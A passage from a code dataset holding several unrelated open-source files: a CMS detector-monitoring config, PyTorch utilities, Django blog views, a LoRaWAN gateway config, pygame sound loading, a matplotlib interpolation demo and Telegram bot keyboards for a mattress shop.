Source\n#-----------------------------\nprocess.load(\"DQM.Integration.test.inputsource_cfi\")\nprocess.EventStreamHttpReader.consumerName = 'SiStrip DQM Consumer'\nprocess.EventStreamHttpReader.SelectEvents = cms.untracked.PSet(SelectEvents = cms.vstring(\n 'HLT_MinBia*','HLT_Jet*','HLT_DiJet*','HLT_HT100U','HLT_MultiVertex*','HLT_Pixel*'))\n#process.EventStreamHttpReader.sourceURL = cms.string('http://dqm-c2d07-30.cms:22100/urn:xdaq-application:lid=30')\n\n\n#----------------------------\n# DQM Environment\n#-----------------------------\nprocess.load(\"DQMServices.Core.DQM_cfg\")\nprocess.DQMStore.referenceFileName = '/dqmdata/dqm/reference/sistrip_reference.root'\nprocess.DQM.filter = '^(SiStrip|Tracking)(/[^/]+){0,5}$'\n\nprocess.load(\"DQMServices.Components.DQMEnvironment_cfi\")\n\n#----------------------------\n# DQM Live Environment\n#-----------------------------\nprocess.load(\"DQM.Integration.test.environment_cfi\")\nprocess.dqmEnv.subSystemFolder = \"SiStrip\"\nprocess.dqmSaver.producer = \"Playback\"\nprocess.dqmSaver.saveByTime = 16\nprocess.dqmSaver.saveByMinute = 16\n\nprocess.dqmEnvTr = cms.EDAnalyzer(\"DQMEventInfo\",\n subSystemFolder = cms.untracked.string('Tracking'),\n eventRateWindow = cms.untracked.double(0.5),\n eventInfoFolder = cms.untracked.string('EventInfo')\n)\n\n#-----------------------------\n# Magnetic Field\n#-----------------------------\n# 0T field\n#process.load(\"Configuration.StandardSequences.MagneticField_0T_cff\")\n# 3.8T field\n#process.load(\"Configuration.StandardSequences.MagneticField_38T_cff\")\n# 4.0T field\n#process.load(\"Configuration.StandardSequences.MagneticField_40T_cff\")\n#process.prefer(\"VolumeBasedMagneticFieldESProducer\")\n\nprocess.load('Configuration.StandardSequences.MagneticField_AutoFromDBCurrent_cff')\n\n#-------------------------------------------------\n# GEOMETRY\n#-------------------------------------------------\nprocess.load(\"Configuration.StandardSequences.GeometryRecoDB_cff\")\n\n#--------------------------\n# Calibration\n#--------------------------\nprocess.load(\"DQM.Integration.test.FrontierCondition_GT_cfi\")\n#--------------------------------------------\n## Patch to avoid using Run Info information in reconstruction\n#\nprocess.siStripQualityESProducer.ListOfRecordToMerge = cms.VPSet(\n cms.PSet( record = cms.string(\"SiStripDetVOffRcd\"), tag = cms.string(\"\") ),\n cms.PSet( record = cms.string(\"SiStripDetCablingRcd\"), tag = cms.string(\"\") ),\n# cms.PSet( record = cms.string(\"RunInfoRcd\"), tag = cms.string(\"\") ),\n cms.PSet( record = cms.string(\"SiStripBadChannelRcd\"), tag = cms.string(\"\") ),\n cms.PSet( record = cms.string(\"SiStripBadFiberRcd\"), tag = cms.string(\"\") ),\n cms.PSet( record = cms.string(\"SiStripBadModuleRcd\"), tag = cms.string(\"\") )\n )\n#-------------------------------------------\n \n#-----------------------\n# Reconstruction Modules\n#-----------------------\n## Collision Reconstruction\nprocess.load(\"Configuration.StandardSequences.RawToDigi_Data_cff\")\nprocess.load(\"Configuration.StandardSequences.Reconstruction_cff\")\nprocess.load(\"Configuration.GlobalRuns.reco_TLR_38X\")\n\n## Cosmic Track Reconstruction\nprocess.load(\"RecoTracker.Configuration.RecoTrackerP5_cff\")\n\n# offline beam spot\nprocess.load(\"RecoVertex.BeamSpotProducer.BeamSpot_cff\")\n\n#--------------------------\n# Strip DQM Source and Client\n#--------------------------\nprocess.load(\"DQM.SiStripMonitorClient.SiStripSourceConfigP5_cff\")\nprocess.TrackMon_gentk.doLumiAnalysis = False\nprocess.TrackMon_ckf.doLumiAnalysis = False\n\nprocess.load(\"DQM.SiStripMonitorClient.SiStripClientConfigP5_cff\")\nprocess.SiStripAnalyser.TkMapCreationFrequency = -1\nprocess.SiStripAnalyser.ShiftReportFrequency = -1\nprocess.SiStripAnalyser.StaticUpdateFrequency = 5\n\n#--------------------------\n# Quality Test\n#--------------------------\nprocess.qTester = cms.EDAnalyzer(\"QualityTester\",\n qtList = cms.untracked.FileInPath('DQM/SiStripMonitorClient/data/sistrip_qualitytest_config.xml'),\n prescaleFactor = cms.untracked.int32(5), \n getQualityTestsFromFile = cms.untracked.bool(True),\n qtestOnEndLumi = cms.untracked.bool(True),\n qtestOnEndRun = cms.untracked.bool(True)\n)\n\n#--------------------------\n# Web Service\n#--------------------------\nprocess.ModuleWebRegistry = cms.Service(\"ModuleWebRegistry\")\n\nprocess.AdaptorConfig = cms.Service(\"AdaptorConfig\")\n\n#--------------------------\n# Producers\n#--------------------------\n# Event History Producer\nprocess.load(\"DPGAnalysis.SiStripTools.eventwithhistoryproducerfroml1abc_cfi\")\n\n# APV Phase Producer\nprocess.load(\"DPGAnalysis.SiStripTools.apvcyclephaseproducerfroml1ts_cfi\")\n\n\n#--------------------------\n# Filters\n#--------------------------\n# HLT Filter\nprocess.load(\"HLTrigger.special.HLTTriggerTypeFilter_cfi\")\n# 0=random, 1=physics, 2=calibration, 3=technical\nprocess.hltTriggerTypeFilter.SelectedTriggerType = 1\n\n# Global Trigger *L1GlobalTrigger) Selection for PhysicsON\nprocess.physicsBitSelector = cms.EDFilter(\"PhysDecl\",\n applyfilter = cms.untracked.bool(True),\n debugOn = cms.untracked.bool(False)\n )\n# L1 Trigger Bit Selection (bit 40 and 41 for BSC trigger)\nprocess.load('L1TriggerConfig.L1GtConfigProducers.L1GtTriggerMaskTechTrigConfig_cff')\nprocess.load('HLTrigger/HLTfilters/hltLevel1GTSeed_cfi')\nprocess.hltLevel1GTSeed.L1TechTriggerSeeding = cms.bool(True)\nprocess.hltLevel1GTSeed.L1SeedsLogicalExpression = cms.string('NOT (36 OR 37 OR 38 OR 39)')\n\n#--------------------------\n# Scheduling\n#--------------------------\nprocess.SiStripSources_LocalReco = cms.Sequence(process.siStripFEDMonitor*process.SiStripMonitorDigi*process.SiStripMonitorClusterReal)\nprocess.SiStripSources_TrkReco = cms.Sequence(process.SiStripMonitorTrack_gentk*process.MonitorTrackResiduals_gentk*process.TrackMon_gentk)\nprocess.SiStripSources_TrkReco_cosmic = cms.Sequence(process.SiStripMonitorTrack_ckf*process.MonitorTrackResiduals_ckf*process.TrackMon_ckf)\nprocess.SiStripClients = cms.Sequence(process.SiStripAnalyser)\nprocess.DQMCommon = cms.Sequence(process.qTester*process.dqmEnv*process.dqmEnvTr*process.dqmSaver)\nprocess.RecoForDQM_LocalReco = cms.Sequence(process.siPixelDigis*process.siStripDigis*process.gtDigis*process.trackerlocalreco)\nprocess.RecoForDQM_TrkReco = cms.Sequence(process.offlineBeamSpot*process.recopixelvertexing*process.ckftracks)\nprocess.RecoForDQM_TrkReco_cosmic = cms.Sequence(process.offlineBeamSpot*process.ctftracksP5)\n\nprocess.p = cms.Path(process.scalersRawToDigi*\n process.APVPhases*\n process.consecutiveHEs*\n process.hltTriggerTypeFilter*\n process.RecoForDQM_LocalReco*\n process.DQMCommon*\n process.SiStripClients*\n process.SiStripSources_LocalReco*\n process.hltLevel1GTSeed*\n process.RecoForDQM_TrkReco*\n process.SiStripSources_TrkReco\n)\n\n","repo_name":"cheidegg/cmg-cmssw_oldAndStable","sub_path":"DQM/Integration/rcms/sistrip_dqm_sourceclient-live_cfg.py","file_name":"sistrip_dqm_sourceclient-live_cfg.py","file_ext":"py","file_size_in_byte":7812,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"92"} +{"seq_id":"30047278172","text":"import operator\nfrom collections import OrderedDict\nfrom itertools import islice\n\nimport torch.nn.functional as F\nimport torch\nimport typing\nfrom torch.nn.modules.rnn import RNNCellBase\nfrom torch.nn.utils.rnn import PackedSequence\n\nfrom common.util import transform_id_to_token\n\n\ndef save_model(model: torch.nn.Module, path):\n torch.save(model.state_dict(), path)\n\ndef load_model(model: torch.nn.Module, path, map_location={}):\n model.load_state_dict(torch.load(path, map_location=map_location))\n\ndef mask_softmax(logit, mask):\n logit = logit * mask\n logit_max, _ = torch.max(logit, dim=-1, keepdim=True)\n logit = logit - logit_max\n logit_exp = torch.exp(logit) * mask\n softmax = logit_exp/torch.sum(logit_exp, dim=-1, keepdim=True)\n return softmax\n\n\ndef to_sparse(x, cuda=True, gpu_index=0):\n \"\"\" converts dense tensor x to sparse format \"\"\"\n print(torch.typename(x))\n x_typename = torch.typename(x).split('.')[-1]\n if cuda:\n sparse_tensortype = getattr(torch.cuda.sparse, x_typename)\n else:\n sparse_tensortype = getattr(torch.sparse, x_typename)\n\n indices = torch.nonzero(x)\n if len(indices.shape) == 0: # if all elements are zeros\n return sparse_tensortype(*x.shape)\n indices = indices.t()\n values = x[tuple(indices[i] for i in range(indices.shape[0]))]\n if cuda:\n return sparse_tensortype(indices, values, x.size(), device=torch.device('cuda:{}'.format(gpu_index)))\n else:\n return sparse_tensortype(indices, values, x.size())\n\n\ndef pack_padded_sequence(padded_sequence, length, batch_firse=False,GPU_INDEX=0):\n _, idx_sort = torch.sort(length, dim=0, descending=True)\n _, idx_unsort = torch.sort(idx_sort, dim=0)\n length = torch.index_select(length, 0, idx_sort)\n if padded_sequence.is_cuda:\n padded_sequence = torch.index_select(padded_sequence, 0, idx_sort.cuda(GPU_INDEX))\n else:\n padded_sequence = torch.index_select(padded_sequence, 0, idx_sort)\n return torch.nn.utils.rnn.pack_padded_sequence(padded_sequence, list(length), batch_first=batch_firse), idx_unsort\n\n\ndef pad_packed_sequence(packed_sequence, idx_unsort, pad_value, batch_firse=False, GPU_INDEX=0):\n padded_sequence, length = torch.nn.utils.rnn.pad_packed_sequence(packed_sequence, batch_first=batch_firse,\n padding_value=pad_value)\n if padded_sequence.is_cuda:\n return torch.index_select(padded_sequence, 0, torch.autograd.Variable(idx_unsort).cuda(GPU_INDEX)), length\n else:\n return torch.index_select(padded_sequence, 0, torch.autograd.Variable(idx_unsort)), length\n\n\ndef pack_sequence(sequences, GPU_INDEX=0):\n length = torch.Tensor([len(seq) for seq in sequences])\n _, idx_sort = torch.sort(length, dim=0, descending=True)\n _, idx_unsort = torch.sort(idx_sort, dim=0)\n sequences = sorted(sequences, key=lambda x: len(x), reverse=True)\n packed_sequences = torch.nn.utils.rnn.pack_sequence(sequences)\n return packed_sequences, idx_unsort\n\n\ndef create_ori_index_to_packed_index_dict(batch_sizes):\n begin_index = 0\n end_index = 0\n res = {}\n for i in range(len(batch_sizes)):\n end_index += batch_sizes[i]\n for j in range(end_index-begin_index):\n res[(j, i)] = begin_index + j\n begin_index += batch_sizes[i]\n return res\n\n\ndef create_stable_log_fn(epsilon):\n def stable_log(softmax_value):\n softmax_value = torch.clamp(softmax_value, epsilon, 1.0-epsilon)\n return torch.log(softmax_value)\n return stable_log\n\n\ndef padded_tensor_one_dim_to_length(one_tensor, dim, padded_length, is_cuda=False, gpu_index=0, fill_value=0):\n before_encoder_shape = list(one_tensor.shape)\n before_encoder_shape[dim] = padded_length - before_encoder_shape[dim]\n expend_tensor = (torch.ones(before_encoder_shape) * fill_value)\n if is_cuda:\n expend_tensor = expend_tensor.cuda(gpu_index)\n padded_outputs = torch.cat((one_tensor, expend_tensor), dim=dim)\n return padded_outputs\n\n\nclass MultiRNNCell(RNNCellBase):\n def __init__(self, cell_list: typing.List[RNNCellBase]):\n super().__init__()\n for idx, module in enumerate(cell_list):\n self.add_module(str(idx), module)\n\n def reset_parameters(self):\n for cell in self._modules.values():\n cell.reset_parameters()\n\n def _get_item_by_idx(self, iterator, idx):\n \"\"\"Get the idx-th item of the iterator\"\"\"\n size = len(self)\n idx = operator.index(idx)\n if not -size <= idx < size:\n raise IndexError('index {} is out of range'.format(idx))\n idx %= size\n return next(islice(iterator, idx, None))\n\n def __getitem__(self, idx):\n if isinstance(idx, slice):\n return MultiRNNCell(OrderedDict(list(self._modules.items())[idx]))\n else:\n return self._get_item_by_idx(self._modules.values(), idx)\n\n def __setitem__(self, idx, module):\n key = self._get_item_by_idx(self._modules.keys(), idx)\n return setattr(self, key, module)\n\n def __delitem__(self, idx):\n if isinstance(idx, slice):\n for key in list(self._modules.keys())[idx]:\n delattr(self, key)\n else:\n key = self._get_item_by_idx(self._modules.keys(), idx)\n delattr(self, key)\n\n def __len__(self):\n return len(self._modules)\n\n def __dir__(self):\n keys = super().__dir__()\n keys = [key for key in keys if not key.isdigit()]\n return keys\n\n def forward(self, h_i, h_s):\n res_h = []\n for h, cell in zip(h_s, self._modules.values()):\n h = cell(h_i, h)\n res_h.append(h)\n if isinstance(cell, torch.nn.LSTMCell):\n h_i = h[0]\n else:\n h_i = h\n return h_i, res_h\n\n\ndef calculate_accuracy_of_code_completion(log_probs, target, ignore_token=None, topk_range=(1, 15), gpu_index=None):\n \"\"\"\n compare the log probility of all possible token with target token. calculate the accuracy of the code.\n ensure dim[1] of log_probs(seq len) is the same as dim[1] of target.\n :param log_probs:\n :param target:\n :param ignore_token:\n :param save_name:\n :param topk_range: (min_k, max_k)\n :return:\n \"\"\"\n # log_probs_size = [batch_size, seq_len, vocab]\n if isinstance(target, list):\n target = torch.LongTensor(target)\n if gpu_index is not None:\n target = target.cuda(gpu_index)\n if isinstance(log_probs, PackedSequence):\n log_probs = log_probs.data\n if isinstance(target, PackedSequence):\n target = target.data\n\n batch_size = log_probs.shape[0]\n vocab_size = log_probs.shape[-1]\n\n log_probs = log_probs.view(-1, vocab_size)\n target = target.view(-1)\n\n if log_probs.shape[0] != target.shape[0]:\n print('different shape between log_probs and target. log_probs: {}, target: {}'.format(log_probs.shape, target.shape))\n raise Exception('different shape between log_probs and target. log_probs: {}, target: {}'.format(log_probs.shape, target.shape))\n\n # if len(log_probs.shape) == 2:\n # log_probs = log_probs.unsqueeze(dim=1)\n\n max_topk = max(*topk_range)\n min_topk = min(*topk_range)\n if min_topk < 1:\n min_topk = 1\n if max_topk < 1:\n max_topk = 1\n\n # top_k_ids_size = [batch_size, seq_len, max_topk]\n top_k_ids = torch.topk(log_probs, dim=1, k=max_topk)[1]\n\n # resize target to the same shape of top k ids\n target = torch.unsqueeze(target, dim=1)\n repeat_shape = [1] * len(target.shape)\n repeat_shape[-1] = max_topk\n repeat_target = target.repeat(*repeat_shape)\n equal_list = torch.eq(top_k_ids, repeat_target)\n\n if ignore_token is not None:\n mask = torch.ne(target, ignore_token)\n zero_tensor = torch.zeros(equal_list.shape).byte()\n if gpu_index is not None:\n zero_tensor = zero_tensor.cuda(gpu_index)\n equal_list = torch.where(mask, equal_list, zero_tensor)\n\n result = {}\n for k in range(min_topk, max_topk+1):\n result[k] = equal_list[:, min_topk-1:k].sum().item()\n return result\n\n\ndef get_predict_and_target_tokens(log_probs, target, id_to_word_fn, k=1, offset=0):\n dim_len = len(log_probs.shape)\n softmaxed_probs = F.softmax(log_probs, dim=dim_len - 1)\n top_k_probs, top_k_ids = torch.topk(softmaxed_probs, dim=2, k=k)\n top_k_ids = top_k_ids.tolist()\n batch_predict = []\n batch_target = []\n for i, one in enumerate(top_k_ids):\n # one shape = [seq_len, k]\n predict_tokens = [transform_id_to_token(one_position, id_to_word_fn, offset=offset) for one_position in one]\n out_token = transform_id_to_token(target[i], id_to_word_fn, offset=offset)\n batch_predict += [predict_tokens]\n batch_target += [out_token]\n return batch_predict, batch_target, top_k_probs.tolist()\n\n\nif __name__ == '__main__':\n a = [torch.Tensor([[1, 2, 3, 4, 0], [4, 3, 2, 1, 5]]),\n torch.Tensor([[1, 2, 3, 4, 0]]),\n torch.Tensor([[1, 2, 3, 4, 0], [4, 3, 2, 1, 5]])]\n b = [torch.LongTensor([3, 4]),\n torch.LongTensor([2, ]),\n torch.LongTensor([3, 1])]\n c, _ = pack_sequence(a)\n d, _ = pack_sequence(b)\n res = calculate_accuracy_of_code_completion(c, d, topk_range=(1, 3), ignore_token=-1)\n print(res)","repo_name":"ssiq/GrammaLanguageModel","sub_path":"common/torch_util.py","file_name":"torch_util.py","file_ext":"py","file_size_in_byte":9384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"31515068695","text":"from django.shortcuts import render, get_object_or_404\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\nfrom django.http import HttpResponse\nfrom django.views.generic import ListView\nfrom .models import Post\nimport markdown\n\n\nclass IndexView(ListView):\n # model = Post\n template_name = 'testblog/index.html'\n context_object_name = 'posts'\n\n def get_queryset(self): # 重写get_queryset方法,只获取前15条记录给首页显示。\n # return super(IndexView, self).get_queryset()[:15]\n return Post.objects.order_by('-created_time')[:15]\n\n# def home(request):\n# posts = Post.objects.all()\n\n# return render(request, 'testblog/index.html', context={\n# 'posts': posts\n# })\n\n\ndef read(request, title):\n post = get_object_or_404(Post, title=title)\n post.body = markdown.markdown(post.body,\n extensions=[\n 'markdown.extensions.extra',\n 'markdown.extensions.codehilite',\n 'markdown.extensions.toc', ])\n\n return render(request, 'testblog/post.html', context={\n 'post': post\n })\n\n\ndef archive(request):\n post_list = Post.objects.order_by('-created_time')\n paginator = Paginator(post_list, 15)\n page = request.GET.get('page')\n total_num = paginator.num_pages\n try:\n posts = paginator.page(page)\n except PageNotAnInteger:\n page = 1\n posts = paginator.page(1)\n except EmptyPage:\n posts = paginator.page(paginator.num_pages)\n\n return render(request, 'testblog/archive.html',\n {'posts': posts, 'page': page,\n 'total_num': total_num})\n","repo_name":"Reignoverme/buzzblog","sub_path":"article/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1744,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"14352362970","text":"import machine\nimport binascii\nimport ubinascii\n\n# Get the WiFi MAC address\nWIFI_MAC = ubinascii.hexlify(machine.unique_id()).upper()\n# Set the Gateway ID to be the first 3 bytes of MAC address + 'FFFE' + last 3 bytes of MAC address\nGATEWAY_ID = WIFI_MAC[:6] + \"FFFE\" + WIFI_MAC[6:12]\n\n# The Things Network Settings\nSERVER = 'router.eu.thethings.network'\nPORT = 1700\n\n# NTP Settings\nNTP = \"pool.ntp.org\"\nNTP_PERIOD_S = 3600\n\n# WiFi settings\nWIFI_SSID = 'xxxxxxxxxxxxxxxx'\nWIFI_PASS = 'xxxxxxxxxxxxxxxx'\n\nDHCP = True\nif not DHCP:\n IP_ADDR = '192.168.0.x'\n IP_MASK = '255.255.255.0'\n IP_GATE = '192.168.0.1'\n IP_DNS = '192.168.0.1'\n\n#LoRa Application keys\nLORA_APP_EUI = binascii.unhexlify('xxxxxxxxxxxxxxxx')\nLORA_APP_KEY = binascii.unhexlify('xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx')\n\n#LoRa frequency for AU915\nLORA_FREQUENCY = 923300000\n\n# Time deplay between updates\nTIMEOUT = 5","repo_name":"chittams/LoRaWAN-OTAA","sub_path":"lib/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":888,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"7176424904","text":"import pygame\nimport os\n\npygame.mixer.init()\n\nmain_dir = os.path.split(os.path.abspath(__file__))[0]\n\n\ndef load_sound(file):\n \"\"\" Loads a soundfile fron data directory \"\"\"\n file = os.path.join(main_dir, 'data', file)\n return pygame.mixer.Sound(file)\n\n# def load_music(file):\n# \"\"\" Loads a soundfile fron data directory \"\"\"\n# file = os.path.join(main_dir, 'data', file)\n# return pygame.mixer.music.load(file)\n\n\nflag_sound = load_sound(\"flag_sound.wav\")\n\nshoot_sound = load_sound(\"tank_shoot_sound.wav\")\n\nbox_sound = load_sound(\"box_sound.wav\")\n\nbackground_music = load_sound(\"background_music.wav\")\n\ntank_shot_sound = load_sound(\"tank_shot_sound.wav\")\n\nvictory_sound = load_sound(\"victory_sound.wav\")\n\n\n\n\n\n","repo_name":"Joar-E/TDDE25---Project","sub_path":"ctf-master/sounds.py","file_name":"sounds.py","file_ext":"py","file_size_in_byte":726,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"43139753206","text":"from matplotlib import pyplot as mpl\nfrom matplotlib.animation import FuncAnimation\nfrom scipy.interpolate import CubicSpline as cs\nfrom scipy.interpolate import Akima1DInterpolator as ak\nfrom scipy.interpolate import BarycentricInterpolator as bc\nimport numpy as np\n\n# methiod that will graph different interpolation of the function\ndef animate(fun, s, xl, yl, nf):\n\n minx = xl[0]\n miny = yl[0]\n maxx = xl[1]\n maxy = yl[1]\n\n f, g = mpl.subplots()\n p = 1000\n xval, yval = [],[]\n xval = np.linspace(minx, maxx, p)\n for i in xval:\n yval.append(fun(i))\n \n mpl.plot(xval, yval, label=\"True\", c=\"blue\")\n\n # Graphs to plot\n l = []\n (akm,) = mpl.plot(l, l, label=\"Akima\", c=\"green\")\n (bry,) = mpl.plot(l, l, label=\"Barycentric\", c=\"purple\")\n (cub,) = mpl.plot(l, l, label=\"Cubic Spline\", c=\"red\")\n\n plot = [cub, akm, bry]\n\n # Initializes the value to graph\n def init():\n g.set_ylabel(\"f(x)\")\n g.set_xlabel(\"x\")\n g.set_ylim(miny, maxy)\n g.set_title(f\"Different Interpolations of {s}\")\n\n return plot\n\n # method to animate the graphs\n def graph(f):\n \n x,y = [],[]\n r = np.random.rand(f)\n n = list(r)\n x = sorted(n)\n for y in x:\n y.append(x[i])\n\n g.set_title(f\"Different Interpolations of {s} for {f} samples\")\n akm.set_data(xval, ak(x, y)(xval))\n bry.set_data(xval, bc(x, y)(xval))\n cub.set_data(xval, cs(x, y)(xval))\n\n return plot\n\n # Setting up the animate\n gif = FuncAnimation(f, graph, blit=True, frames=nf, init_func=init)\n\n mpl.legend()\n mpl.show()\n return gif\n\n# Sample Given Test Function\ndef eval(x):\n\n s = np.sin(x * 30)\n t = np.tan(x)\n e = np.exp(x)\n p = t * s * e\n return p\n\np=\"tan(x)⋅sin(30x)⋅eˣ\"\ngif = animate(fun=eval,s=p,xl=(0, 1),yl=(-4, 4),nf=100)\n","repo_name":"Mak1226/Computational_Methods_And_Applications","sub_path":"week3/q5.py","file_name":"q5.py","file_ext":"py","file_size_in_byte":1888,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"72949183991","text":"#aiogram imports\nfrom aiogram.types import InlineKeyboardMarkup, ReplyKeyboardMarkup, KeyboardButton, InlineKeyboardButton, ReplyKeyboardRemove\n\n\n\ndef start_markup(lang='ru'):\n mattresses_btn = {\n 'ru': KeyboardButton('Матрасы \\U0001F6CF'),\n 'en': KeyboardButton('Mattresses \\U0001F6CF'),\n 'kg': KeyboardButton('Матрацтар \\U0001F6CF'),\n } #display inline buttons with mattresses' categories\n\n accessories_btn = {\n 'ru': KeyboardButton('Аксессуары \\U0001F45C'),\n 'en': KeyboardButton('Accessories \\U0001F45C'),\n 'kg': KeyboardButton('Аксессуарлар \\U0001F45C'),\n } #display accessories\n about_us_btn = {\n 'ru': KeyboardButton('О нас \\U0001F4F0'),\n 'en': KeyboardButton('About Us \\U0001F4F0'),\n 'kg': KeyboardButton('Биз жөнүндө \\U0001F4F0'),\n } #send about us text and a website link\n social_media_btn = {\n 'ru': KeyboardButton('Мы в социальных сетях \\U0001F4E8'),\n 'en': KeyboardButton('Our social media \\U0001F4E8'),\n 'kg': KeyboardButton('Биздин социалдык тармактар \\U0001F4E8'),\n } #send another markup with social media links\n leave_review_btn = {\n 'ru': KeyboardButton('Оставить отзыв \\U0001F4DD'),\n 'en': KeyboardButton('Leave a review \\U0001F4DD'),\n 'kg': KeyboardButton('Пикир калтыруу \\U0001F4DD'),\n } #ask for a review in an FSM and store it\n reviews_btn = {\n 'ru': KeyboardButton('Отзывы \\U0001F4D6'),\n 'en': KeyboardButton('Reviews \\U0001F4D6'),\n 'kg': KeyboardButton('Пикирлер \\U0001F4D6'),\n } #shows available reviews\n change_language_btn = {\n 'ru': KeyboardButton('Поменять язык \\U0001F524'),\n 'en': KeyboardButton('Change language \\U0001F524'),\n 'kg': KeyboardButton('Тилди өзгөртүү \\U0001F524'),\n } #shows abailable languages\n receive_notifications_btn = {\n 'ru': KeyboardButton('Получать сообщения о скидках \\U0001F523'),\n 'en': KeyboardButton('Receive notifications about discounts \\U0001F523'),\n 'kg': KeyboardButton('Арзандатуулар жөнүндө информация билип туруу \\U0001F523'),\n }\n return ReplyKeyboardMarkup(resize_keyboard=True).add(mattresses_btn[lang], accessories_btn[lang]).add(about_us_btn[lang]).add(social_media_btn[lang]).add(leave_review_btn[lang], reviews_btn[lang], change_language_btn[lang]).add(receive_notifications_btn[lang])\n\ndef mattresses_catalog(lang='ru'):\n #The following inline buttons show up when 'see_mattrasses' is called\n all_mattresses = {\n 'ru': InlineKeyboardButton('Все матрасы \\U0001F30D', callback_data='category_all'),\n 'en': InlineKeyboardButton('All the mattresses \\U0001F30D', callback_data='category_all'),\n 'kg': InlineKeyboardButton('Бардык матрацтар \\U0001F30D', callback_data='category_all'),\n }\n big_discount_mattresses = {\n 'ru': InlineKeyboardButton('Матрасы со скидками \\U0001F4B2', callback_data='category_dsc'),\n 'en': InlineKeyboardButton('Discounted Mattresses \\U0001F4B2', callback_data='category_dsc'),\n 'kg': InlineKeyboardButton('Арзандатуулар менен матрацтар \\U0001F4B2', callback_data='category_dsc'),\n }\n cheap_mattresses = {\n 'ru': InlineKeyboardButton('Недорогие матрасы \\U0001F495', callback_data='category_chp'),\n 'en': InlineKeyboardButton('Inexpensive mattresses \\U0001F495', callback_data='category_chp'),\n 'kg': InlineKeyboardButton('Арзан матрацтар \\U0001F495', callback_data='category_chp'),\n }\n heavy_mattresses = {\n 'ru': InlineKeyboardButton('Для тяжёлых людей \\U0001F62C', callback_data='category_hvy'),\n 'en': InlineKeyboardButton('For heavy people \\U0001F62C', callback_data='category_hvy'),\n 'kg': InlineKeyboardButton('Оор адамдар үчүн \\U0001F62C', callback_data='category_hvy'),\n }\n hard_mattresses = {\n 'ru': InlineKeyboardButton('Жёсткие матрасы \\U0001F5FF', callback_data='category_hrd'),\n 'en': InlineKeyboardButton('Hard mattresses \\U0001F5FF', callback_data='category_hrd'),\n 'kg': InlineKeyboardButton('Катуу матрацтар \\U0001F5FF', callback_data='category_hrd'),\n }\n soft_mattresses = {\n 'ru': InlineKeyboardButton('Мягкие матрасы \\U0001F607', callback_data='category_sft'),\n 'en': InlineKeyboardButton('Soft mattresses \\U0001F607', callback_data='category_sft'),\n 'kg': InlineKeyboardButton('Жумшак матрацтар \\U0001F607', callback_data='category_sft'),\n }\n kid_mattresses = {\n 'ru': InlineKeyboardButton('Детские матрасы \\U0001F476', callback_data='category_kid'),\n 'en': InlineKeyboardButton('Kid mattresses \\U0001F476', callback_data='category_kid'),\n 'kg': InlineKeyboardButton('Балдар үчүн матрацтар \\U0001F476', callback_data='category_kid'),\n }\n return InlineKeyboardMarkup().add(all_mattresses[lang]).add(big_discount_mattresses[lang]).add(cheap_mattresses[lang]).add(heavy_mattresses[lang]).add(kid_mattresses[lang]).add(hard_mattresses[lang], soft_mattresses[lang])\n\ndef product_inline_keyboard(product_name: str, lang='ru'):\n place_order = {\n 'ru': InlineKeyboardButton('Оформить заказ', callback_data=f'choose_{product_name}'),\n 'en': InlineKeyboardButton('Place an order', callback_data=f'choose_{product_name}'),\n 'kg': InlineKeyboardButton('Заказ кылуу', callback_data=f'choose_{product_name}'),\n }\n\n text_manager = {\n 'ru': InlineKeyboardButton('Написать консультанту', url='https://t.me/toktokozhoev'),\n 'en': InlineKeyboardButton('Text a manager', url='https://t.me/toktokozhoev'),\n 'kg': InlineKeyboardButton('Менеджерге жазуу', url='https://t.me/toktokozhoev'),\n }\n\n return InlineKeyboardMarkup().row(place_order[lang], text_manager[lang])\n\ndef website_inline_keyboard(lang='ru'):\n website_link_button = {\n 'ru': InlineKeyboardButton('Перейти на сайт', url='https://www.ormatt.kg/'),\n 'en': InlineKeyboardButton('Go to the website', url='https://www.ormatt.kg/'),\n 'kg': InlineKeyboardButton('Сайтка шилтеме', url='https://www.ormatt.kg/'),\n }\n return InlineKeyboardMarkup().add(website_link_button[lang])\n\ndef social_media_inline_keyboard(lang='ru'):\n instagram_inline_btn = {\n 'ru': InlineKeyboardButton(text='Инстаграм', url='https://www.instagram.com/ormatt.kg'),\n 'en': InlineKeyboardButton(text='Instagram', url='https://www.instagram.com/ormatt.kg'),\n 'kg': InlineKeyboardButton(text='Инстаграм', url='https://www.instagram.com/ormatt.kg'),\n }\n facebook_inline_btn = {\n 'ru': InlineKeyboardButton(text='Фейсбук', url='https://www.facebook.com/ormattmattresses/'),\n 'en': InlineKeyboardButton(text='Facebook', url='https://www.facebook.com/ormattmattresses/'),\n 'kg': InlineKeyboardButton(text='Фейсбук', url='https://www.facebook.com/ormattmattresses/'),\n }\n email_inline_btn = {\n 'ru': InlineKeyboardButton(text='E-mail \\U0001F4E7', url='mailto:ormatt.kg@gmail.com'),\n 'en': InlineKeyboardButton(text='E-mail \\U0001F4E7', url='mailto:ormatt.kg@gmail.com'),\n 'kg': InlineKeyboardButton(text='E-mail \\U0001F4E7', url='mailto:ormatt.kg@gmail.com'),\n }\n\n return InlineKeyboardMarkup().add(instagram_inline_btn[lang]).add(facebook_inline_btn[lang]).add(email_inline_btn[lang])\n\ndef change_language_inline_keyboard():\n return InlineKeyboardMarkup().add(InlineKeyboardButton('КЫР', callback_data='language_kg'), InlineKeyboardButton('РУС', callback_data='language_ru'), InlineKeyboardButton('ENG', callback_data='language_en'))\n\ndef leave_a_review_cancel(lang='ru'):\n cancel = {\n 'ru': KeyboardButton('Отмена \\U0001F555'),\n 'en': KeyboardButton('Cancel \\U0001F555'),\n 'kg': KeyboardButton('Жокко чыгаруу \\U0001F555'),\n }\n return ReplyKeyboardMarkup(resize_keyboard=True).add(cancel[lang])\n\ndef cancel_buy_markup(lang='ru'):\n cancel = {\n 'ru': 